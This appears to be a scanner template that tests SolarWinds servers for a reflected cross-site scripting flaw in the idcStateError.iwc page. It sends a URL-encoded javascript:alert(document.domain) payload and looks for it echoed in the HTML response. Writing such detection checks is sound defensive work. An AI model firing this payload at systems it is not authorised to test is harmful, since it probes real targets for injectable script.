id: solarwinds-xss
info:
  name: SolarWinds XSS (Required Interaction)
  risk: Low

params:
  - root: "{{.BaseURL}}"

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/iwc/idcStateError.iwc?page=%27%22javascript%3aalert(document.domain)%2f%2f
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
    detections:
      - >-
        StatusCode() == 200 && StringSearch('response', 'javascript:alert(document.domain)') && StringSearch("resHeaders", 'text/html') && StringSearch('response', 'error_step')
